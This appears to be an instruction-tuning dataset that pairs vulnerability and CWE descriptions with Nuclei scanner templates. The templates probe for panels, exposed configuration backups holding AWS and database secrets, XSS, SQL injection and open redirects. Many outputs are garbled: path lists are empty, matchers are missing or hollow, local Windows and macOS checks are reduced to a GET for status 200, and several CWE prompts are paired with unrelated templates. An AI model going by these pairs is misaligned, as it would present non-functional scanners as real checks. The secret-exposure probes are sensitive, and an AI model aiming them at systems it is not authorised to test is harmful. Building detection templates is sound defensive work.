exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: cisco-ios-xe-panel\n\ninfo:\n name: Cisco IOS XE - Detect\n author: bhutch\n severity: info\n description: Cisco IOS XE login panel was detected.\n tags: panel,cisco,ssl,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: slant\n\ninfo:\n name: Slant User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Slant user name information check was conducted.\n tags: osint,osint-shopping,slant,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.slant.co/users/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"s Profile - Slant\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Aurora Snapshot Tag Copy", "input": "Title: Aurora Snapshot Tag Copy\nSummary: Aurora Snapshot Tag Copy. Ensures Amazon Aurora clusters have Copy Tags to Snapshots feature enabled to automatically copy tags from clusters to snapshots.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: aurora-copy-tags-snap\n\ninfo:\n name: Aurora Snapshot Tag Copy\n author: princechaddha\n severity: high\n description: Ensures Amazon Aurora clusters have Copy Tags to Snapshots feature enabled to automatically copy tags from clusters to snapshots.\n tags: cloud,devops,aws,amazon,aurora,rds,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "aurora-copy-tags-snap"} {"instruction": "Generate a Nuclei template for: Cookie Consent Detection", "input": "Title: Cookie Consent Detection\nSummary: Cookie Consent Detection. This template detects the presence of cookie consent forms\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: cookie-consent-detection\n\ninfo:\n name: Cookie Consent Detection\n author: rxerium\n severity: info\n description: This template detects the presence of cookie consent forms\n tags: headless,cookie,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "cookie-consent-detection"} {"instruction": "Generate a Nuclei template for CVE-2019-2767", "input": "Title: Unknown Vulnerability in oracle bi_publisher\nSummary: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security). The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher). While the vulnerability is in BI Publisher (formerly XML Publisher), attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of BI Publisher (formerly XML Publisher) accessible data as well as unauthorized read access to a subset of BI Publisher (formerly XML Publisher) accessible data. CVSS 3.0 Base Score 7.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N).\nVulnerability Type: Unknown Vulnerability\nSeverity: high\nAffected Products: oracle bi_publisher\nIndicators: unauthorized", "output": "id: CVE-2019-2767\n\ninfo:\n name: Oracle Business Intelligence Publisher - XML External Entity Injection\n author: madrobot\n severity: high\n description: Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher.\n tags: cve,cve2019,edb,oracle,xxe,oast,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"http\" \n part: interactsh_protocol", "category": "cve", "severity": "high", "id": "CVE-2019-2767"} {"instruction": "Generate a Nuclei template for: HP iLO", "input": "Title: HP iLO\nSummary: HP iLO. Version of HP iLO. Tags: tech, ilo, discovery\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: ilo-detect\n\ninfo:\n name: HP iLO\n author: milo2012\n severity: info\n description: Version of HP iLO\n tags: tech,ilo,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/xmldata?item=all\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"text/xml\" \n part: header\n - type: word\n words:\n - \"<RIMP>\" \n - \"<HSI>\" \n condition: and", "category": "generic", "severity": "info", "id": "ilo-detect"} {"instruction": "Generate a Nuclei template for: Finicity Client Secret", "input": "Title: Finicity Client Secret\nSummary: Finicity Client Secret. Tags: exposure, finicity, file\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: finicity-clientsecret\n\ninfo:\n name: Finicity Client Secret\n author: DhiyaneshDK\n severity: info\n description: Finicity Client Secret\n tags: exposure,finicity,file,token,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "finicity-clientsecret"} {"instruction": "Generate a Nuclei template for: WordPress adivaha Travel Plugin 2.3 - SQL Injection", "input": "Title: WordPress adivaha Travel Plugin 2.3 - SQL Injection\nSummary: WordPress adivaha Travel Plugin 2.3 - SQL Injection. An unauthenticated Time-Based SQL injection found in adivaha Travel Plugin 2.3 allows a remote attacker to retrieve the contents of an entire database.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: wp-adivaha-sqli\n\ninfo:\n name: WordPress adivaha Travel Plugin 2.3 - SQL Injection\n author: theamanrawat\n severity: high\n description: An unauthenticated Time-Based SQL injection found in adivaha Travel Plugin 2.3 allows a remote attacker to retrieve the contents of an entire database.\n tags: time-based-sqli,sqli,adivaha,wordpress,wp,wp-plugin,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "high", "id": "wp-adivaha-sqli"} {"instruction": "Generate a Nuclei template for: Prometheus Monitoring System - Unauthenticated", "input": "Title: Prometheus Monitoring System - Unauthenticated\nSummary: Prometheus Monitoring System - Unauthenticated. Detects unauthenticated access to Prometheus Time Series Collection and Processing Server by checking for specific elements in the response from the `/graph` endpoint.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: prometheus-unauth\n\ninfo:\n name: Prometheus Monitoring System - Unauthenticated\n author: pussycat0x\n severity: high\n description: Detects unauthenticated access to Prometheus Time Series Collection and Processing Server by checking for specific elements in the response from the `/graph` endpoint.\n tags: unauth,prometheus,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/config\" \n - \"{{BaseURL}}/api/v1/status/config\" \n matchers:\n - type: word\n words:\n - \"global:\" \n - \"scrape_configs:\" \n - \"scrape_interval\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "prometheus-unauth"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: cpanel-api-codes\n\ninfo:\n name: cPanel API Codes Panel - Detect\n author: DhiyaneshDK\n severity: info\n description: cPanel API Codes panel was detected.\n tags: panel,cpanel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"<title>CPanel - API Codes\" \n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: auto-usb-install\n\ninfo:\n name: Fortinet Auto USB Installation Enabled - Detect\n author: pussycat0x\n severity: info\n description: Via Fortinet Auto USB installation, an attacker with physical access to a FortiGate can load a new configuration or firmware using the USB port, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: audit,config,file,firewall,fortigate\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2023-3990", "input": "Title: Cross-Site Scripting (XSS) in mingsoft mcms\nSummary: A vulnerability classified as problematic has been found in Mingsoft MCMS up to 5.3.1. This affects an unknown part of the file search.do of the component HTTP POST Request Handler. The manipulation of the argument style leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-235611.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: low\nAffected Products: mingsoft mcms\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-3990\n\ninfo:\n name: Mingsoft MCMS < 5.3.1 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: A vulnerability classified as problematic has been found in Mingsoft MCMS up to 5.3.1. This affects an unknown part of the file search.do of the component HTTP POST Request Handler. The manipulation of the argument style leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-235611.\n tags: cve,cve2023,mingsoft,mcms,xss,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"mingsoft.net\" \n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"alert\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: content_type\n - type: status\n status:\n - 200", "category": "cve", "severity": "low", "id": "CVE-2023-3990"} {"instruction": "Generate a Nuclei template for CVE-2024-22207", "input": "Title: Vulnerability (CWE-1188) in smartbear swagger_ui\nSummary: fastify-swagger-ui is a Fastify plugin for serving Swagger UI. Prior to 2.1.0, the default configuration of `@fastify/swagger-ui` without `baseDir` set will lead to all files in the module's directory being exposed via http routes served by the module. The vulnerability is fixed in v2.1.0. Setting the `baseDir` option can also work around this vulnerability.\nVulnerability Type: Vulnerability (CWE-1188)\nSeverity: medium\nAffected Products: smartbear swagger_ui\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-22207\n\ninfo:\n name: Fastify Swagger-UI - Information Disclosure\n author: DhiyaneshDK,iamnoooob\n severity: medium\n description: fastify-swagger-ui is a Fastify plugin for serving Swagger UI. Prior to 2.1.0, the default configuration of `@fastify/swagger-ui` without `baseDir` set will lead to all files in the module's directory being exposed via http routes served by the module. The vulnerability is fixed in v2.1.0. Setting the `baseDir` option can also work around this vulnerability.\n tags: cve,cve2024,swagger-ui,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/documentation/playwright.config.js\" \n matchers:\n - type: word\n words:\n - \"module.exports\" \n - \"defineConfig\" \n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2024-22207"} {"instruction": "Generate a Nuclei template for: LightStart \u2013 Maintenance Mode, Coming Soon and Landing Page Builder Detection", "input": "Title: LightStart \u2013 Maintenance Mode, Coming Soon and Landing Page Builder Detection\nSummary: LightStart \u2013 Maintenance Mode, Coming Soon and Landing Page Builder Detection\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-wp-maintenance-mode\n\ninfo:\n name: LightStart \u2013 Maintenance Mode, Coming Soon and Landing Page Builder Detection\n author: ricardomaia\n severity: info\n description: LightStart \u2013 Maintenance Mode, Coming Soon and Landing Page Builder Detection\n tags: tech,wordpress,wp-plugin,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wp-maintenance-mode/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-wp-maintenance-mode"} {"instruction": "Generate a Nuclei template for: Data Execution Prevention (DEP) Not Enabled", "input": "Title: Data Execution Prevention (DEP) Not Enabled\nSummary: Data Execution Prevention (DEP) Not Enabled. Checks if Data Execution Prevention (DEP) is not fully enabled for all programs.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: windows-dep-disabled\n\ninfo:\n name: Data Execution Prevention (DEP) Not Enabled\n author: princechaddha\n severity: high\n description: Checks if Data Execution Prevention (DEP) is not fully enabled for all programs.\n tags: windows,security,dep,code,windows-audit\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "windows-dep-disabled"} {"instruction": "Generate a Nuclei template for CVE-2020-23015", "input": "Title: Vulnerability (CWE-601) in opnsense opnsense\nSummary: An open redirect issue was discovered in OPNsense through 20.1.5. The redirect parameter \"url\" in login page was not filtered and can redirect user to any website.\nVulnerability Type: Vulnerability (CWE-601)\nSeverity: medium\nAffected Products: opnsense opnsense\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-23015\n\ninfo:\n name: OPNsense <=20.1.5 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: OPNsense through 20.1.5 contains an open redirect vulnerability via the url redirect parameter in the login page, which is not filtered. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: cve2020,cve,redirect,opnsense,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?url=http://interact.sh\" \n matchers:\n - type: regex\n part: header", "category": "cve", "severity": "medium", "id": "CVE-2020-23015"} {"instruction": "Generate a Nuclei template for: Apache Shenyu Gateway Management System - Detect", "input": "Title: Apache Shenyu Gateway Management System - Detect\nSummary: Apache Shenyu Gateway Management System - Detect. Detects a Apache Shenyu Gateway Management System, a Java native API Gateway for service proxy, protocol conversion and API governance.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: apache-shenyu-detect\n\ninfo:\n name: Apache Shenyu Gateway Management System - Detect\n author: icarot\n severity: info\n description: Detects a Apache Shenyu Gateway Management System, a Java native API Gateway for service proxy, protocol conversion and API governance.\n tags: tech,shenyu,apache,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Apache ShenYu Gateway\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "apache-shenyu-detect"} {"instruction": "Generate a Nuclei template for: ChatGPT Web - Unauthorized Access", "input": "Title: ChatGPT Web - Unauthorized Access\nSummary: ChatGPT Web - Unauthorized Access. ChatGPT Web is exposed.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: chatgpt-web-unauth\n\ninfo:\n name: ChatGPT Web - Unauthorized Access\n author: SleepingBag945\n severity: high\n description: ChatGPT Web is exposed.\n tags: chatgpt,unauth,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"status\":\"Success\"\" \n - \"\"auth\":false\" \n - \"ChatGPTAPI\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "chatgpt-web-unauth"} {"instruction": "Generate a Nuclei template for CVE-2020-24912", "input": "Title: Cross-Site Scripting (XSS) in qcubed qcubed\nSummary: A reflected cross-site scripting (XSS) vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: qcubed qcubed\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-24912\n\ninfo:\n name: QCube Cross-Site-Scripting\n author: pikpikcu\n severity: medium\n description: A reflected cross-site scripting vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users.\n tags: cve2020,cve,qcubed,xss,seclists,vuln\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/assets/_core/php/profile.php\" \n - \"{{BaseURL}}/assets/php/profile.php\" \n - \"{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"Content-Type: text/html\" \n part: header", "category": "cve", "severity": "medium", "id": "CVE-2020-24912"} {"instruction": "Generate a Nuclei template for: macOS SUID/SGID Files Detection", "input": "Title: macOS SUID/SGID Files Detection\nSummary: macOS SUID/SGID Files Detection. Discovers files with SUID or SGID permissions in user-writable directories (/usr/local, /opt, /Applications) that could be exploited for privilege escalation if misconfigured or vulnerable.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: suid-sgid-files\n\ninfo:\n name: macOS SUID/SGID Files Detection\n author: geeknik\n severity: high\n description: Discovers files with SUID or SGID permissions in user-writable directories (/usr/local, /opt, /Applications) that could be exploited for privilege escalation if misconfigured or vulnerable.\n tags: macos,audit,local,security,privesc\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "suid-sgid-files"} {"instruction": "Generate a Nuclei template for: Content-Security-Policy Bypass - Quantserve SegAPI", "input": "Title: Content-Security-Policy Bypass - Quantserve SegAPI\nSummary: Content-Security-Policy Bypass - Quantserve SegAPI\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: quantserve-segapi-csp-bypass\n\ninfo:\n name: Content-Security-Policy Bypass - Quantserve SegAPI\n author: renniepak,DhiyaneshDK\n severity: medium\n description: Content-Security-Policy Bypass - Quantserve SegAPI\n tags: xss,csp-bypass,quantserve-segapi,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Content-Security-Policy\" \n - \"quantserve.com\" \n part: header\n condition: and", "category": "generic", "severity": "medium", "id": "quantserve-segapi-csp-bypass"} {"instruction": "Generate a Nuclei template for: Uservoice Takeover Detection", "input": "Title: Uservoice Takeover Detection\nSummary: Uservoice Takeover Detection. Uservoice takeover was detected.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: uservoice-takeover\n\ninfo:\n name: Uservoice Takeover Detection\n author: MiryangJung\n severity: high\n description: Uservoice takeover was detected.\n tags: takeover,uservoice,hackerone,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n - type: word\n words:\n - \"This UserVoice subdomain is currently available!\"", "category": "generic", "severity": "high", "id": "uservoice-takeover"} {"instruction": "Generate a Nuclei template for CVE-2021-24987", "input": "Title: Cross-Site Scripting (XSS) in heateor super_socializer\nSummary: The Social Share, Social Login and Social Comments Plugin WordPress plugin before 7.13.30 does not sanitise and escape the urls parameter in its the_champ_sharing_count AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response, leading to a Reflected Cross-Site Scripting issue.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: heateor super_socializer\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24987\n\ninfo:\n name: WordPress Super Socializer <7.13.30 - Cross-Site Scripting\n author: Akincibor\n severity: medium\n description: WordPress Super Socializer plugin before 7.13.30 contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the urls parameter in its the_champ_sharing_count AJAX action (available to both unauthenticated and authenticated users) before outputting it back in the response.\n tags: cve2021,cve,wpscan,xss,wp,wp-plugin,wordpress,heateor,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]=\" \n matchers:\n - type: word\n words:\n - \"{\"facebook_urls\":[[\"\"]]\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-24987"} {"instruction": "Generate a Nuclei template for: Openweb UI Panel - Detect", "input": "Title: Openweb UI Panel - Detect\nSummary: Openweb UI Panel - Detect. An OpenWebUI panel was detected\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: openwebui-panel\n\ninfo:\n name: Openweb UI Panel - Detect\n author: rxerium\n severity: info\n description: An OpenWebUI panel was detected\n tags: panel,openwebui,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Open WebUI\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "openwebui-panel"} {"instruction": "Generate a Nuclei template for: POP3 Security Checks", "input": "Title: POP3 Security Checks\nSummary: POP3 Security Checks. A simple workflow that runs all POP3 related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: pop3-workflow\n\ninfo:\n name: POP3 Security Checks\n author: pussycat0x\n severity: info\n description: A simple workflow that runs all POP3 related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "pop3-workflow"} {"instruction": "Generate a Nuclei template for: Pega Infinity Detection", "input": "Title: Pega Infinity Detection\nSummary: Pega Infinity Detection. Tags: tech, pega, discovery\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: pega-detect\n\ninfo:\n name: Pega Infinity Detection\n author: sshell\n severity: info\n description: Pega Infinity Detection\n tags: tech,pega,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/prweb/PRRestService/unauthenticatedAPI/v1/docs\" \n matchers:\n - type: word\n words:\n - \"\"description\" :\"The Pega API\" \n part: body\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"application/json\" \n part: header", "category": "generic", "severity": "info", "id": "pega-detect"} {"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: gophish-default-login\n\ninfo:\n name: Gophish < v0.10.1 Default Credentials\n author: arcc,dhiyaneshDK\n severity: high\n description: For versions of Gophish > 0.10.1, the temporary administrator credentials are printed in the logs when you first execute the Gophish binary.\n tags: gophish,default-login,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-522"} {"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: dbeaver-credentials\n\ninfo:\n name: DBeaver - Credentials Discovery\n author: geeknik,j4vaovo\n severity: medium\n description: DBeaver credentials were discovered.\n tags: exposure,dbeaver,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-522"} {"instruction": "Generate a Nuclei template for: AWS S3 keys Leak", "input": "Title: AWS S3 keys Leak\nSummary: AWS S3 keys Leak. AWS S3 keys are exposed.. Tags: aws, s3, wordpress\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: wpconfig-aws-keys\n\ninfo:\n name: AWS S3 keys Leak\n author: r12w4n\n severity: high\n description: AWS S3 keys are exposed.\n tags: aws,s3,wordpress,disclosure,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-config.php-backup\" \n - \"{{BaseURL}}/%c0\" \n matchers:\n - type: word\n words:\n - \"access-key-id\" \n - \"secret-access-key\" \n - \"DB_NAME\" \n - \"DB_PASSWORD\" \n part: body\n condition: and", "category": "generic", "severity": "high", "id": "wpconfig-aws-keys"} {"instruction": "Generate a Nuclei template for: Tongda OA v11.8 logincheck_code.php - Authentication Bypass", "input": "Title: Tongda OA v11.8 logincheck_code.php - Authentication Bypass\nSummary: Tongda OA v11.8 logincheck_code.php - Authentication Bypass. There is a login bypass vulnerability in Tongda OA v11.8 logincheck_code.php, through which an attacker can log in to the system administrator background\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: tongda-login-code-authbypass\n\ninfo:\n name: Tongda OA v11.8 logincheck_code.php - Authentication Bypass\n author: SleepingBag945\n severity: high\n description: There is a login bypass vulnerability in Tongda OA v11.8 logincheck_code.php, through which an attacker can log in to the system administrator background\n tags: tongda,authbypass,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "high", "id": "tongda-login-code-authbypass"} {"instruction": "Generate a Nuclei template for: Prestashop Installer Exposure", "input": "Title: Prestashop Installer Exposure\nSummary: Prestashop Installer Exposure. Prestashop is susceptible to the Installation page exposure due to misconfiguration.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: prestashop-installer\n\ninfo:\n name: Prestashop Installer Exposure\n author: tess\n severity: high\n description: Prestashop is susceptible to the Installation page exposure due to misconfiguration.\n tags: misconfig,prestashop,exposure,install,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/install/index.php\" \n matchers:\n - type: word\n words:\n - \"PrestaShop Installation Assistant\" \n - \"
  • System configuration
  • \" \n - \"
  • Store installation
  • \" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "prestashop-installer"} {"instruction": "Generate a Nuclei template for: DNS Zone Transfer Check", "input": "Title: DNS Zone Transfer Check\nSummary: DNS Zone Transfer Check. Ensure DNS zone transfers are restricted by verifying that the SecureSecondaries registry value is set to 2 for all active zones.\nUnrestricted zone transfers can expose sensitive domain information, helping attackers map the network infrastructure.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: dns-zone-transfer-check\n\ninfo:\n name: DNS Zone Transfer Check\n author: nukunga[SungHyunJeon]\n severity: medium\n description: Ensure DNS zone transfers are restricted by verifying that the SecureSecondaries registry value is set to 2 for all active zones.\nUnrestricted zone transfers can expose sensitive domain information, helping attackers map the network infrastructure.\n tags: code,windows-audit,kisa,dns,zone-transfer\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "dns-zone-transfer-check"} {"instruction": "Generate a Nuclei template for: Tongda OA v11.5 swfupload_new.php - SQL Injection", "input": "Title: Tongda OA v11.5 swfupload_new.php - SQL Injection\nSummary: Tongda OA v11.5 swfupload_new.php - SQL Injection. There is a SQL injection vulnerability in the swfupload_new.php file of Tongda OA v11.5. An attacker can obtain sensitive information of the server through the vulnerability.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: tongda-oa-swfupload-sqli\n\ninfo:\n name: Tongda OA v11.5 swfupload_new.php - SQL Injection\n author: SleepingBag945\n severity: high\n description: There is a SQL injection vulnerability in the swfupload_new.php file of Tongda OA v11.5. An attacker can obtain sensitive information of the server through the vulnerability.\n tags: tongda,sqli,intrusive,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"insert into FILE_CONTENT(\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "tongda-oa-swfupload-sqli"} {"instruction": "Generate a Nuclei template for: Node.js Express NODE_ENV Development Mode", "input": "Title: Node.js Express NODE_ENV Development Mode\nSummary: Node.js Express NODE_ENV Development Mode. The Node.js application runs in development mode, which can expose sensitive information, such as source code and secrets, depending on the application.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: node-express-dev-env\n\ninfo:\n name: Node.js Express NODE_ENV Development Mode\n author: FLX\n severity: medium\n description: The Node.js application runs in development mode, which can expose sensitive information, such as source code and secrets, depending on the application.\n tags: nodejs,express,misconfig,devops,cicd,trace,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "medium", "id": "node-express-dev-env"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor 